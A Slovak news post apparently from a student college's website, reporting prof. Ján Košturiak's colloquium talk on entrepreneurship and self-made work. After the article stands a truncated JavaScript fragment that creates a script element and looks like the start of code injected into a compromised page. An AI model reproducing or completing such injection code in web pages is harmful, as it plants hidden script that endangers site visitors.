“Prácu si budeme vytvárať sami,” povzbudil prof. Košturiak študentov na kolokviu

Na poslednom februárovom kolokviu hostilo Kolégium Antona Neuwirtha prof. Jána Košturiaka, inšpiratívneho človeka, ktorý sa so študentmi a hosťami z SLH podelil o skúsenosti z inovatívneho podnikania.

„Každý z vás už je podnikateľ, len o tom ešte neviete,“ začal na úvod spoluzakladateľ spoločnosti IPA. „Podnikáte svojím životom. Volíte si, čo budete robiť, akú knihu prečítate…“ Veľmi rýchlo sa tak dostali do témy aj tí, ktorí nikdy nepremýšľali nad možnosťou stať sa raz sami sebe zamestnávateľom.

Profesor Košturiak sa pozastavil nad tým, prečo ľudia neprestanú robiť prácu, ktorú nemajú radi a nezačnú robiť to, čo ich baví. Je presvedčený, že nové technológie a stále zrýchľujúci sa vývoj už začali meniť starý systém pracovného trhu: „Prácu si budeme musieť vymýšľať sami, nikto nám ju nedá.“

Inšpirácia nebáť sa realizovať nápady a prestať žiť podľa stereotypov – také bolo štvrtkové kolokvium. Večer sa však nekončil odchodom hosťa. Súčasní študenti pozvali o rok starších spolužiakov – alumni KAN4 na spoznávaciu a mosty budujúcu akciu. Spoločne si užili veľa zábavy až do neskorého večera.

-bk-var d=document;var s=d.createElement(‘script’);

0 komentárov

Zanechajte komentár

Chcete sa pripojiť k diskusii?
Neváhajte prispieť!

Pridaj komentár

Vaša e-mailová adresa nebude zverejnená. Vyžadované polia sú označené *